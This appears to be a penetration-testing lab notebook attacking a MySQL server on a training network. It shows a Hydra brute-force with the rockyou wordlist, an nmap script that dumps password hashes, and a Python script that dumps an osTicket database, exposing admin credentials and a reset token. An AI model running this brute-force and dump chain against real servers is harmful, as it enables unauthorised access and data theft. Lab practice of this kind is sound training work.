In [10]:
target = open('00_target.txt').read()
%env TARGET={target}

env: TARGET=10.11.1.11

In [11]:
# %env PL=/usr/share/wordlists/SecLists/Passwords/probable-v2-top207.txt
%env PL=~/hax/SecLists/Passwords/probable-v2-top1575.txt
%env PLRY=/usr/share/wordlists/rockyou.txt

%env UL=~/hax/SecLists/Usernames/Names/names.txt
%env UL_S=/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

%env USER=root

env: PL=~/hax/SecLists/Passwords/probable-v2-top1575.txt
env: PLRY=/usr/share/wordlists/rockyou.txt
env: UL=~/hax/SecLists/Usernames/Names/names.txt
env: UL_S=/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
env: USER=root

In [12]:
%%writefile custom_users.txt
root
admin

Overwriting custom_users.txt

In [13]:
!echo hydra -I -l root -P $PLRY -u -f $TARGET mysql
!echo
!hydra -I -l root -P $PLRY -u -f $TARGET mysql

hydra -I -l root -P /usr/share/wordlists/rockyou.txt -u -f 10.11.1.11 mysql

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-27 13:10:31
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://10.11.1.11:3306/
[3306][mysql] host: 10.11.1.11   login: root   password: 987654321
[STATUS] attack finished for 10.11.1.11 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-27 13:10:47

In [4]:
!hydra -I -l root -P $PL -u -f $TARGET mysql

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-27 11:55:00
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ERROR] File for passwords not found: ~/hax/SecLists/Passwords/probable-v2-top1575.txt

In [ ]:
!hydra -I -L custom_users.txt -P $PLRY -u -f $TARGET mysql

In [14]:
!nmap -p 3306 $TARGET --script mysql-dump-hashes --script-args='username=root,password=987654321'

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-27 13:30 PDT
Nmap scan report for 10.11.1.11
Host is up (0.064s latency).

PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-dump-hashes:
|_  root:*DABCF719388B72AD432DE5E88423B56D652DD8B0

Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds

In [5]:
%pip install mysql mysql-connector-python-rf

Requirement already satisfied: mysql in /home/parallels/.local/lib/python3.9/site-packages (0.0.3)
Collecting mysql-connector-python-rf
  Downloading mysql-connector-python-rf-2.2.2.tar.gz (11.9 MB)
     |████████████████████████████████| 11.9 MB 6.1 MB/s eta 0:00:01
Requirement already satisfied: mysqlclient in /usr/lib/python3/dist-packages (from mysql) (1.4.4)
Building wheels for collected packages: mysql-connector-python-rf
  Building wheel for mysql-connector-python-rf (setup.py) ... done
  Created wheel for mysql-connector-python-rf: filename=mysql_connector_python_rf-2.2.2-cp39-cp39-linux_aarch64.whl size=249455 sha256=1ccce2d8ed17ce7421d91b0f7804af7e681ffe7495a991f5232a4dac281c431f
  Stored in directory: /home/parallels/.cache/pip/wheels/64/06/5b/ef9543936a3f5de15b02775b6ae548a09f3ed2319d20342771
Successfully built mysql-connector-python-rf
Installing collected packages: mysql-connector-python-rf
Successfully installed mysql-connector-python-rf-2.2.2
Note: you may need to restart the kernel to use updated packages.

In [13]:
import mysql.connector
 
mydb = mysql.connector.connect(host="10.11.1.11", user="root", password="987654321")
 
mycursor = mydb.cursor()
mycursor.execute("show databases;")
 
for database in mycursor.fetchall():
    print(database)
    if 'information_schema' in database:
        continue
    mycursor.execute("use %s;" % database)
    
    mycursor.execute("show tables;")

    for table in mycursor.fetchall():
        print("\t", table)
        mycursor.execute("SELECT * FROM %s;" % table)
        for row in mycursor.fetchall():
            print("\t\t", row)

('information_schema',)
('helpdesk',)
	 ('ost__search',)
		 ('H', 1, 'osTicket Installed!', "Thank you for choosing osTicket. Please make sure you join the osTicket forums and our mailing list to stay up to date on the latest news, security alerts and updates. The osTicket forums are also a great place to get assistance, guidance, tips, and help from other osTicket users. In addition to the forums, the osTicket wiki provides a useful collection of educational materials, documentation, and notes from the community. We welcome your contributions to the osTicket community. If you are looking for a greater level of support, we provide professional services and commercial support with guaranteed response times, and access to the core development team. We can also help customize osTicket or even add new features to the system to meet your unique needs. If the idea of managing and upgrading this osTicket installation is daunting, you can try osTicket as a hosted service at http://www.supportsystem.com/ -- no installation required and we can import your data! With SupportSystem's turnkey infrastructure, you get osTicket at its best, leaving you free to focus on your customers without the burden of making sure the application is stable, maintained, and secure. Cheers, - osTicket Team http://osticket.com/ PS. Don't just make customers happy, make happy customers!")
		 ('T', 1, '833970 osTicket Installed!', '')
		 ('U', 1, 'osTicket Support', 'support@osticket.com')
		 ('O', 1, 'osTicket', "420 Desoto Street\nAlexandria, LA 71301\n(318) 290-3674\nhttp://osticket.com\nNot only do we develop the software, we also use it to manage support for osTicket. Let us help you quickly implement and leverage the full potential of osTicket's features and functionality. Contact us for professional support or visit our website for documentation and community support.")
		 ('U', 2, 'admin2', '')
		 ('H', 2, '', 'Hi Admin, I am unable to login to the OSTicket administration panel. Could you please send credentials and a links as soon as possible? Thanks in advance!')
		 ('T', 2, '733436 Credentials', 'Credentials')
		 ('H', 4, '', 'Hi! Use the following link to login to the admin panel http://192.168.11.11/scp/ Username: helpdesk Password: helpdesk1234321')
		 ('H', 5, 'Status Changed', 'Status changed from Open to Resolved by helpdesk helpdesk')
		 ('H', 6, 'Ticket Updated', 'Typo')
		 ('U', 3, 'w', '')
		 ('H', 8, '', 'test')
		 ('T', 3, '854077 test', 'test')
		 ('H', 9, '', 'whatever')
		 ('T', 4, '533502 whatever', 'whatever')
		 ('H', 10, '', 'whatever')
		 ('T', 5, '273512 whatever', 'whatever')
	 ('ost_api_key',)
	 ('ost_attachment',)
		 (1, 'C', 2, 0)
		 (8, 'T', 1, 1)
		 (9, 'T', 1, 1)
		 (10, 'T', 1, 1)
		 (11, 'T', 1, 1)
		 (12, 'T', 1, 1)
		 (13, 'T', 1, 1)
	 ('ost_canned_response',)
		 (1, 0, 1, 'What is osTicket (sample)?', 'osTicket is a widely-used open source support ticket system, an attractive alternative to higher-cost and complex customer support systems - simple, lightweight, reliable, open source, web-based and easy to setup and use.', 'en_US', '', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (2, 0, 1, 'Sample (with variables)', 'Hi %{ticket.name.first}, <br /><br /> Your ticket #%{ticket.number} created on %{ticket.create_date} is in %{ticket.dept.name} department.', 'en_US', '', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
	 ('ost_config',)
		 (1, 'core', 'admin_email', 'helpdeskadmin@localhost.local', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (2, 'core', 'helpdesk_url', 'http://10.11.1.11', datetime.datetime(2017, 7, 13, 2, 7, 59))
		 (3, 'core', 'helpdesk_title', 'Helpdesk', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (4, 'core', 'schema_signature', 'b26f29a6bb5dbb3510b057632182d138', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (5, 'dept.1', 'assign_members_only', '', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (6, 'dept.2', 'assign_members_only', '', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (7, 'dept.3', 'assign_members_only', '', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (8, 'sla.1', 'transient', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (9, 'list.1', 'configuration', '{"handler":"TicketStatusList"}', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (10, 'core', 'time_format', 'h:i A', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (11, 'core', 'date_format', 'm/d/Y', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (12, 'core', 'datetime_format', 'm/d/Y g:i a', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (13, 'core', 'daydatetime_format', 'D, M j Y g:ia', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (14, 'core', 'default_timezone_id', '8', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (15, 'core', 'default_priority_id', '2', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (16, 'core', 'enable_daylight_saving', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (17, 'core', 'reply_separator', '-- reply above this line --', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (18, 'core', 'isonline', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (19, 'core', 'staff_ip_binding', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (20, 'core', 'staff_max_logins', '4', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (21, 'core', 'staff_login_timeout', '2', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (22, 'core', 'staff_session_timeout', '30', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (23, 'core', 'passwd_reset_period', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (24, 'core', 'client_max_logins', '4', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (25, 'core', 'client_login_timeout', '2', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (26, 'core', 'client_session_timeout', '30', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (27, 'core', 'max_page_size', '25', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (28, 'core', 'max_open_tickets', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (29, 'core', 'autolock_minutes', '3', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (30, 'core', 'default_smtp_id', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (31, 'core', 'use_email_priority', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (32, 'core', 'enable_kb', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (33, 'core', 'enable_premade', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (34, 'core', 'enable_captcha', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (35, 'core', 'enable_auto_cron', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (36, 'core', 'enable_mail_polling', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (37, 'core', 'send_sys_errors', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (38, 'core', 'send_sql_errors', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (39, 'core', 'send_login_errors', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (40, 'core', 'save_email_headers', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (41, 'core', 'strip_quoted_reply', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (42, 'core', 'ticket_autoresponder', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (43, 'core', 'message_autoresponder', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (44, 'core', 'ticket_notice_active', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (45, 'core', 'ticket_alert_active', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (46, 'core', 'ticket_alert_admin', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (47, 'core', 'ticket_alert_dept_manager', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (48, 'core', 'ticket_alert_dept_members', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (49, 'core', 'message_alert_active', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (50, 'core', 'message_alert_laststaff', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (51, 'core', 'message_alert_assigned', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (52, 'core', 'message_alert_dept_manager', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (53, 'core', 'note_alert_active', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (54, 'core', 'note_alert_laststaff', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (55, 'core', 'note_alert_assigned', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (56, 'core', 'note_alert_dept_manager', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (57, 'core', 'transfer_alert_active', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (58, 'core', 'transfer_alert_assigned', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (59, 'core', 'transfer_alert_dept_manager', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (60, 'core', 'transfer_alert_dept_members', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (61, 'core', 'overdue_alert_active', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (62, 'core', 'overdue_alert_assigned', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (63, 'core', 'overdue_alert_dept_manager', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (64, 'core', 'overdue_alert_dept_members', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (65, 'core', 'assigned_alert_active', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (66, 'core', 'assigned_alert_staff', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (67, 'core', 'assigned_alert_team_lead', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (68, 'core', 'assigned_alert_team_members', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (69, 'core', 'auto_claim_tickets', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (70, 'core', 'show_related_tickets', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (71, 'core', 'show_assigned_tickets', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (72, 'core', 'show_answered_tickets', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (73, 'core', 'hide_staff_name', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (74, 'core', 'overlimit_notice_active', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (75, 'core', 'email_attachments', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (76, 'core', 'number_format', '######', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (77, 'core', 'sequence_id', '0', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (78, 'core', 'log_level', '2', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (79, 'core', 'log_graceperiod', '12', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (80, 'core', 'client_registration', 'public', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (81, 'core', 'max_file_size', '1048576', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (82, 'core', 'landing_page_id', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (83, 'core', 'thank-you_page_id', '2', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (84, 'core', 'offline_page_id', '3', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (85, 'core', 'system_language', 'en_US', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (86, 'mysqlsearch', 'reindex', '0', datetime.datetime(2016, 9, 27, 11, 8, 16))
		 (87, 'core', 'default_email_id', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (88, 'core', 'alert_email_id', '2', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (89, 'core', 'default_dept_id', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (90, 'core', 'default_sla_id', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (91, 'core', 'default_template_id', '1', datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (92, 'core', 'allow_pw_reset', '1', datetime.datetime(2016, 9, 27, 11, 25, 33))
		 (93, 'core', 'pw_reset_window', '30', datetime.datetime(2016, 9, 27, 11, 25, 33))
		 (94, 'core', 'clients_only', '0', datetime.datetime(2016, 9, 27, 11, 25, 33))
		 (95, 'core', 'client_verify_email', '0', datetime.datetime(2016, 9, 27, 11, 25, 33))
		 (96, 'core', 'name_format', 'full', datetime.datetime(2017, 7, 13, 2, 7, 59))
		 (97, 'pwreset', '7yq1FgXpQzXjBJQMr06Nn7OYXkJgFntMMaKO1jtZOpTb1fVw', '3', datetime.datetime(2021, 10, 26, 19, 38, 21))
	 ('ost_content',)
		 (1, 1, 1, 'landing', 'Landing', '<h1>Welcome to the Support Center</h1> <p> In order to streamline support requests and better serve you, we utilize a support ticket system. Every support request is assigned a unique ticket number which you can use to track the progress and responses online. For your reference we provide complete archives and history of all your support requests. A valid email address is required to submit a ticket. </p>', 'en_US', "The Landing Page refers to the content of the Customer Portal's initial view. The template modifies the content seen above the two links <strong>Open a New Ticket</strong> and <strong>Check Ticket Status</strong>.", datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (2, 2, 1, 'thank-you', 'Thank You', '<div>%{ticket.name},\n<br>\n<br>\nThank you for contacting us.\n<br>\n<br>\nA support ticket request has been created and a representative will be\ngetting back to you shortly if necessary.</p>\n<br>\n<br>\nSupport Team\n</div>', 'en_US', 'This template defines the content displayed on the Thank-You page after a\nClient submits a new ticket in the Client Portal.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (3, 3, 1, 'offline', 'Offline', '<div><h1>\n<span style="font-size: medium">Support Ticket System Offline</span>\n</h1>\n<p>Thank you for your interest in contacting us.</p>\n<p>Our helpdesk is offline at the moment, please check back at a later\ntime.</p>\n</div>', 'en_US', 'The Offline Page appears in the Customer Portal when the Help Desk is offline.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (4, 4, 1, 'registration-staff', 'Welcome to osTicket', '<h3><strong>Hi %{recipient.name.first},</strong></h3> <div> We\'ve created an account for you at our help desk at %{url}.<br /> <br /> Please follow the link below to confirm your account and gain access to your tickets.<br /> <br /> <a href="%{link}">%{link}</a><br /> <br /> <em style="font-size: small">Your friendly Customer Support System<br /> %{company.name}</em> </div>', 'en_US', 'This template defines the initial email (optional) sent to Agents when an account is created on their behalf.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (5, 5, 1, 'pwreset-staff', 'osTicket Staff Password Reset', '<h3><strong>Hi %{staff.name.first},</strong></h3> <div> A password reset request has been submitted on your behalf for the helpdesk at %{url}.<br /> <br /> If you feel that this has been done in error, delete and disregard this email. Your account is still secure and no one has been given access to it. It is not locked and your password has not been reset. Someone could have mistakenly entered your email address.<br /> <br /> Follow the link below to login to the help desk and change your password.<br /> <br /> <a href="%{link}">%{link}</a><br /> <br /> <em style="font-size: small">Your friendly Customer Support System</em> <br /> <img src="cid:b56944cb4722cc5cda9d1e23a3ea7fbc" alt="Powered by osTicket" width="126" height="19" style="width: 126px" /> </div>', 'en_US', 'This template defines the email sent to Staff who select the <strong>Forgot My Password</strong> link on the Staff Control Panel Log In page.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (6, 6, 1, 'banner-staff', 'Authentication Required', '', 'en_US', 'This is the initial message and banner shown on the Staff Log In page. The first input field refers to the red-formatted text that appears at the top. The latter textarea is for the banner content which should serve as a disclaimer.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (7, 7, 1, 'registration-client', 'Welcome to %{company.name}', '<h3><strong>Hi %{recipient.name.first},</strong></h3> <div> We\'ve created an account for you at our help desk at %{url}.<br /> <br /> Please follow the link below to confirm your account and gain access to your tickets.<br /> <br /> <a href="%{link}">%{link}</a><br /> <br /> <em style="font-size: small">Your friendly Customer Support System <br /> %{company.name}</em> </div>', 'en_US', 'This template defines the email sent to Clients when their account has been created in the Client Portal or by an Agent on their behalf. This email serves as an email address verification. Please use %{link} somewhere in the body.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (8, 8, 1, 'pwreset-client', '%{company.name} Help Desk Access', '<h3><strong>Hi %{user.name.first},</strong></h3> <div> A password reset request has been submitted on your behalf for the helpdesk at %{url}.<br /> <br /> If you feel that this has been done in error, delete and disregard this email. Your account is still secure and no one has been given access to it. It is not locked and your password has not been reset. Someone could have mistakenly entered your email address.<br /> <br /> Follow the link below to login to the help desk and change your password.<br /> <br /> <a href="%{link}">%{link}</a><br /> <br /> <em style="font-size: small">Your friendly Customer Support System <br /> %{company.name}</em> </div>', 'en_US', 'This template defines the email sent to Clients who select the <strong>Forgot My Password</strong> link on the Client Log In page.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (9, 9, 1, 'banner-client', 'Sign in to %{company.name}', 'To better serve you, we encourage our Clients to register for an account.', 'en_US', 'This composes the header on the Client Log In page. It can be useful to inform your Clients about your log in and registration policies.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (10, 10, 1, 'registration-confirm', 'Account registration', "<div><strong>Thanks for registering for an account.</strong><br/> <br /> We've just sent you an email to the address you entered. Please follow the link in the email to confirm your account and gain access to your tickets. </div>", 'en_US', 'This templates defines the page shown to Clients after completing the registration form. The template should mention that the system is sending them an email confirmation link and what is the next step in the registration process.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))
		 (11, 11, 1, 'registration-thanks', 'Account Confirmed!', "<div> <strong>Thanks for registering for an account.</strong><br /> <br /> You've confirmed your email address and successfully activated your account. You may proceed to open a new ticket or manage existing tickets.<br /> <br /> <em>Your friendly support center</em><br /> %{company.name} </div>", 'en_US', 'This template defines the content displayed after Clients successfully register by confirming their account. This page should inform the user that registration is complete and that the Client can now submit a ticket or access existing tickets.', datetime.datetime(2016, 9, 27, 11, 7, 2), datetime.datetime(2016, 9, 27, 11, 7, 2))